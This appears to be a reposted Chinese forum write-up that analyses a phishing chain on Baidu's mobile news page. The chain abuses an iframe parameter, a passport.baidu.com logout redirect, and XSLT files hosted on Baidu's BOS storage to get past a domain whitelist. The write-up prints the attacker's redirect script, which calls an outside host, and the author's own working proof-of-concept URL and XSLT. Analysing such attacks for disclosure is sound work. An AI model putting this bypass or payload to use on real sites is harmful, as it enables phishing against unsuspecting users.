https://m.baidu.com/?from=ddcai#iact=wiseindex/tabs/news/activity/newsdetail={“linkData”:{“name”:“iframe/mib-iframe”,“url”:“https://passport.baidu.com/?logout=&aid=7&u=https://data5678.bj.bcebos.com/16556/mc?data=kG1e6hRQytb7Uk2B6sXrCdzDEo5eN9ta6Xu4YWzI4deXwu3aG02sNOw5-QYUjq7F”}} 45

{
    "linkData": {
        "name": "iframe/mib-iframe",
        "url": "https://passport.baidu.com/?logout=&aid=7&u=https://data5678.bj.bcebos.com/16556/mc?data=kG1e6hRQytb7Uk2B6sXrCdzDEo5eN9ta6Xu4YWzI4deXwu3aG02sNOw5-QYUjq7F"
    }
}

这个应该是百度新闻(百家号)的一个页面,原本应该是百度引用自己家网站其他页面的信息所用。

页面中iframe链接被替换成了骗子自己的网站(现在钓鱼网站已被删除,现在显示404)。

https://passport.baidu.com/?logout=&aid=7&u=https://data5678.bj.bcebos.com/16556/mc?data=kG1e6hRQytb7Uk2B6sXrCdzDEo5eN9ta6Xu4YWzI4deXwu3aG02sNOw5-QYUjq7F 17

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml">
    <xsl:template match="/">
        <html>
            <head>
                <title>...</title>
                <meta content="always" name="referrer"/>
            </head>
            <body>
                <script><![CDATA[
                    document.addEventListener("DOMContentLoaded", function() {
                        processData();
                    });

                    function processData() {
                        var data = decodeURIComponent(window.location.search.substr(1)); // 解码URL参数
                        // 只在调用后端接口时在sbm后追加/time
                        var apiEndpoint = 'https://book.muzhix.cn/rpa.php';
                        data = data.split('data=')[1];
                        var xhr = new XMLHttpRequest();
                        xhr.open('GET', apiEndpoint + '?data=' + data, true);
                        xhr.onreadystatechange = function () {
                            if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
                                var responseData = JSON.parse(xhr.responseText);
                                window.location.href = responseData.data;
                            }
                        };
                        xhr.send();
                    }
                ]]></script>
            </body>
        </html>
    </xsl:template>
</xsl:stylesheet>

这个 XSLT 样式表是用来将 XML 输入转换成 HTML 页面的。
页面中包含 JavaScript 代码,用于处理 URL 参数并使用 AJAX 向服务器端脚本发送请求。
<html>
    <head>
        <title>...</title>
        <meta content="always" name="referrer"/>
    </head>
    <body>
        <script>
            document.addEventListener("DOMContentLoaded", function() {
                processData();
            });

            function processData() {
                var url = 'https://linux.do/u/k452b';
                window.location.href = url;
            }
        </script>
    </body>
</html>

遂找到 储存桶设置 – 配置管理 – 静态网站托管 打开,但也失败,始终是下载。

转载

打开文档阅读说明如下:只要是以官方域访问html的,均为下载形式。

转载

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml">
    <xsl:template match="/">
        <html>
            <head>
                <title>...</title>
                <meta content="always" name="referrer"/>
            </head>
            <body>
                <script><![CDATA[
                    document.addEventListener("DOMContentLoaded", function() {
                        processData();
                    });

                    function processData() {
                        var url = 'https://linux.do/u/k452b';
                        window.location.href = url
                    }
                ]]></script>
            </body>
        </html>
    </xsl:template>
</xsl:stylesheet>

转载

转载

转载

https://m.baidu.com/?from=ddcai#iact=wiseindex/tabs/news/activity/newsdetail=%7B%2522linkData%2522%253A%7B%2522name%2522%253A%2522iframe%252Fmib-iframe%2522%252C%2522url%2522%253A%2522https%253A%252F%252Fpassport.baidu.com%252F%253Flogout%253D%2526aid%253D7%2526u%253Dhttps%253A%252F%252Flinuxdo.gz.bcebos.com%252Flinuxdo.xml%2522%7D%7D 86

绕过iframe域名白名单

攻击者找到了一种方法,即使用百度自己的域名(如百度云对象存储 BOS 的域名 bj.bcebos.comgz.bcebos.com)来加载恶意内容。
由于这些域名属于百度内部,攻击者通过这些域名上传恶意内容,从而绕过了白名单机制。
在百度云对象储存BOS中

攻击者发现了通过上传 XML 文件绕过HTML文件的限制,XML 文件被浏览器解析为HTML网页并执行其中的JS代码。
这种方法利用了浏览器对 XML 的默认处理方式,即作为文本类型解析,而不是强制下载。

本文转自 https://linux.do/t/topic/168244

❤️转载请注明出处❤️